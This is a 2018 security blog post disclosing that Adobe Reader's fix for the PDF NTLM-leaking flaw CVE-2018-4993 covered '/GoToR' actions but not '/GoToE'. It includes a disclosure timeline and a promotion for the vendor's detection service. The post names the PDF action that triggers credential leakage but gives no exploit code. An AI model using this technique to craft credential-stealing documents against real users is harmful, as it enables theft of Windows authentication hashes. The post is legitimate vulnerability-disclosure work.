Tuesday, November 13, 2018

The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993

In April or May 2018, Check Point released a blog post detailing a NTLM leaking vulnerability on Adobe Reader & Foxit Reader. Later, Adobe released a security advisory claiming the vulnerability was fixed since Acrobat Reader DC 2018.011.20040. However, we found that only one variant of this vulnerability were successfully patched by Adobe, and the other variant was not actually addressed.

The story
Recently, during a testing for our EdgeLogic engine (the backend engine of our free exploit detection service edgespot.io), we found at least two samples producing interesting detection results.

When we put these two samples into our engine, they were detected as "MALICIOUS - POTENTIAL ZERO-DAY ATTACK (NTLM leaking)". They looks like the following:

[Update on Nov. 14]
Users of edgespot.io will find the Detection Details of this particular threat have been changed to "exploit CVE-2018-15979 (NTLM leaking), previously zero-day (modified on 20181114)", starting today. This is because today we modified the description of the threat, to reflect that the patch is available and a CVE ID is assigned to this threat.

Could it be a false detection? Of course it could be. Given that the techniques of attacking are always evolving, exploit detection is not an easy task.

In order to confirm this test result, we fired up our VM, updated it to the latest Adobe Reader version, and tested those two samples manually. We observed that those two samples still making the NTLM traffic going out.

After further research, we confirmed that those two samples are actually exploiting the same or similar vulnerability CVE-2018-4993, which was discussed by the Check Point blog post we mentioned earlier. As in the Check Point blog, it stated:
/S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
When we examined the content of the two samples, we found the key parts of the two pdfs are:

They both use the “/GotoE” keyword to trigger the NTLM leaking. We later confirmed that while the method of "/GotoR" was patched by Adobe, the method of "/GotoE" was not.

We conclude this is a failure patching of the CVE-2018-4993 rather than a new vulnerability because the Check Point blog mentioned this variant when disclosing the CVE-2018-4993. Please note we do not know if both variants (“/GoToR” and “/GoToE”) were reported to Adobe by Check Point, but clearly, one variant was not fixed.

Nevertheless, from the view of protecting users, it is a big deal for following reasons:
  1. This is about a zero-day (no patch) exploit.
  2. The detail of the zero-day exploit has been in the public for more than 5 months.
  3. Regarding the two samples on VT (it's likely there's more, although we found these two samples by chance), we do not know why they were submitted to VT and who did it, there is possibility that bad guys realized this variant was not patched so trying to test their zero-day exploits.
We realized this is an important finding, therefore, we reported to Adobe as fast as we can regardless of our busy agenda of developing the system & website for edgespot.io. We are happy that they took this issue quickly and patched it fast, here is the disclosure timeline:

2018.11.04 finding reported to Adobe
2018.11.05 Adobe confirmed the finding & notified us they plan to release a patch on Nov. 13
2018.11.13 patch released & blog post released

We ask users to patch their Adobe Reader as soon as possible, please follow Adobe's security advisory released today.

This finding proves the power of our EdgeLogic engine that behinds the https://edgespot.io - it has outstanding capability of identifying unknown & zero-day exploits! By offering it as a free service to everyone, we hope to make the internet a safer place. So, when you encounter some suspicious samples, no matter it is an email format (eml, msg), Office files (doc, xls, ppt), pdf, or even .zip, try edgespot.io and see what it detects!

[Update on Nov. 14]
We have detected yet another sample exploiting this zero-day.

Unlike the previous two that used internal IP addresses, this one used an external IP address, which looks more likely a real in-the-wild attack.We're sharing this info to help the security community on threat intelligence.

No comments:

Post a Comment